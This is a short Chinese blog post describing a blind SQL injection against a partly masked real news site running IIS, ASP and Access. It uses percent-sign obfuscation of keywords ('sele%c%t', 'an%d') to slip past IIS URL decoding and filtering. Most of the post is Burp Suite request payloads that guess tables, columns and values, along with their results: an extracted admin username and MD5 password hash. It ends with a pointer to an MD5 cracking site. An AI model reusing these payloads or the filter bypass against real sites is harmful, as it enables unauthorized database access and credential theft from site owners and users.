- A+
显示不全请点击全屏阅读
环境:
http://www.s**g.cn/news.asp?id=262
IIS+asp+access
原理:
在之前快递厂商安全小测中提到过。IIS下的asp.dll文件在对asp文件后参数串进行url解码时,会直接过滤掉09-0d(09是tab键,0d是回车)、20(空格)、%(下两个字符有一个不是十六进制)字符。
这里是用burp suite来跑的,构造的绕过语句如下:
猜表
GET /news.asp?id=262%20and%20exist%s%20(sele%c%t%20count(*)%20from%20§表名§)
有admin表
猜字段
GET /news.asp?id=262%20an%d%20(sele%c%t%20count(§字段名§)%20from%20admin)%3E0
有user和pass字段
猜user字段的长度
GET /news.asp?id=262%20an%d%20(sele%c%t%20top%201%20len(user)%20from%20admin)=1
长度为5
猜pass字段的长度
GET /news.asp?id=262%20an%d%20(sele%c%t%20top%201%20len(pass)%20from%20admin)=1
长度为32
猜user内容
GET /news.asp?id=262%20an%d%20(sele%c%t%20top%201%20asc(mid(user,1,1))%20from%20admin)=§97§
admin
猜pass内容
GET /news.asp?id=262%20an%d%20(sele%c%t%20top%201%20asc(mid(pass,1,1))%20from%20admin)=§97§
a7b1467f2a5eecb631e2e5ffeafddeb8
从上面看只是简单的sql注入语句加上一点绕过方法。顺便推荐一个国外的md5破解网站,md5decrypter,成功率还是比较高。
by qingsh4n
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡